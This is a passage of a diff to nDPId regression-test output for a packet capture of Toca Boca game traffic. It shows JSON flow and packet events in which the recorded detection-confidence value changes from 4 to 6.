+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649339424328,"flow_last_seen":1649339424328,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1649339424328,"l3_proto":"ip4","src_ip":"92.38.154.49","dst_ip":"192.168.2.100","src_port":5055,"dst_port":32867,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":33,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":33,"packets-processed":32,"total-skipped-flows":0,"total-l4-payload-len":4155,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":4,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1649357329801} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":85,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":54983,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1649357329801,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1649357329801,"pkt":"eJS0JASgYDjgxTWgCABFAABxId0AAD8R6VDAqAJkW8dRe9bHE78AXZvqAZ0AAgAAADR76ExLAf8AAAAAABQAAAAAAAAAAIrS+jcGAAEEAAAANQAAAAHzAAEIHkEEAQA4MjYyMDUzMS04NzM3LTQ4MjQtOGZkMi1hNGQyOWUyNA=="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":85,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":54983,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":85,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":54983,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"91.199.81.130","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43064,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1649357329801,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1649357329801,"pkt":"YDjgxTWgeJS0JASgCABFAAApSEAAADsRxy5bx1GCwKgCZBO\/qDgAFdCFfX19fX19fX19fX19EgAAAAAA"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"91.199.81.130","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43064,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649339424328,"flow_last_seen":1649339424328,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"92.38.154.49","dst_ip":"192.168.2.100","src_port":5055,"dst_port":32867,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649339413371,"flow_last_seen":1649339414587,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":480,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":55544,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"91.199.81.130","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43064,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649339424328,"flow_last_seen":1649339424328,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"92.38.154.49","dst_ip":"192.168.2.100","src_port":5055,"dst_port":32867,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649339413371,"flow_last_seen":1649339414587,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":480,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1649357329801,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":55544,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357385501,"flow_last_seen":1649357385501,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649357385501,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":44818,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1649357385501,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1649357385501,"pkt":"eJS0JASgYDjgxTWgCABFAABULJIAAD8R3rjAqAJkW8dRe68SE78AQNh6\/\/8AAQAAC5AWFTW+Av8BBAAAACwAAAABAAAEsAAAgAAAAAACAAAAAAAAAAAAABOIAAAAAgAAAAI="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357385501,"flow_last_seen":1649357385501,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649357385501,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":44818,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357385501,"flow_last_seen":1649357385501,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649357385501,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":44818,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1649357385537,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1649357385537,"pkt":"YDjgxTWgeJS0JASgCABFAABoscMAADsRXXNbx1F7wKgCZBO\/rxIAVC6GAAAAAorT0\/0WFTW+Af8AAAAAABQAAAAAAAAAAQAAC5AD\/wEAAAAALAAAAABH6wSwAACAAAAAAAIAAAAAAAAAAAAAE4gAAAACAAAAAg=="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1649357386016,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649357386016,"pkt":"eJS0JASgYDjgxTWgCABFAAA8LNEAAD8R3pHAqAJkW8dRe68SE78AKMpCR+sAAQAADZcWFTW+Af8AAAAAABQAAAAAAAAAAIrT0\/0="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357623776,"flow_last_seen":1649357623776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":60837,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1649357623776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1649357623776,"pkt":"YDjgxTWgeJS0JASgCABFAABLD1IAADsRAAJbx1F7wKgCZBO\/7aUAN6TVAAAAAorXdpgVzsWSAQAAAAAAABQAAAAAAAAAAQAAEP0GAAEAAAAADwAAAAHzAQA="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357623776,"flow_last_seen":1649357623776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":60837,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":85,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":54983,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649357385501,"flow_last_seen":1649357387791,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1714,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":44818,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"91.199.81.130","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43064,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357623776,"flow_last_seen":1649357623776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":60837,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":85,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":54983,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649357385501,"flow_last_seen":1649357387791,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1714,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":44818,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357329801,"flow_last_seen":1649357329801,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649357623776,"l3_proto":"ip4","src_ip":"91.199.81.130","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43064,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357796478,"flow_last_seen":1649357796478,"flow_idle_time":200000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1649357796478,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":37218,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1649357796478,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1649357796478,"pkt":"eJS0JASgYDjgxTWgCABFAAC76dUAAD8RIQ7AqAJkW8dRe5FiE78Ap9\/gQYIAAwAAEKFwWW0qAQAAAAAAABQAAAAAAAAAAYraGScGAAEEAAAAcwAAAALzBgABAUNgqO2TCWkNPwQmb\/To5eafmHwk2M3jcXw+syR8\/2ZkLpAnxsjBo9NJIRg3niLIEBe1BKRcjcw9VsSC9Wp8xiV3ZwLnTCAQMR7QxRv8JFOFvJff26sic0VghOwZl+0g5UdBDP8BBAAAAAwAAAAC"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357796478,"flow_last_seen":1649357796478,"flow_idle_time":200000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1649357796478,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":37218,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649357796478,"flow_last_seen":1649357796478,"flow_idle_time":200000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1649357796478,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":37218,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":52,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":52,"packets-processed":51,"total-skipped-flows":0,"total-l4-payload-len":6173,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":9,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":46,"global_ts_msec":1649358122834} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649358122834,"flow_last_seen":1649358122834,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":33311,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00642{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1649358122834,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1649358122834,"pkt":"YDjgxTWgeJS0JASgCABFAACyLPAAADsR4fxbx1F7wKgCZBO\/gh8AnmVJAAAAAorfFD0zMIisAQAAAAAAABQAAAAAAAAAAgAAAG4GAAEAAAAAdgAAAALzBwAAAAgBAUNg8vSS5O+J\/XjOQQuCE\/Kz82hilWidCgaS8LTWICvsbjJnfEWbmMIZg+HqoUshflWYbYRWr5V8d81p2Yo8Hq57m1zea2a8m\/5YufPz7tt8hhSQ3WPzZMeBz21Wv8GmKuYQ"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649358122834,"flow_last_seen":1649358122834,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":33311,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357623776,"flow_last_seen":1649357623776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":60837,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357796478,"flow_last_seen":1649357796478,"flow_idle_time":200000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":37218,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649358122834,"flow_last_seen":1649358122834,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":33311,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357623776,"flow_last_seen":1649357623776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":60837,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649357796478,"flow_last_seen":1649357796478,"flow_idle_time":200000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1649358122834,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":37218,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 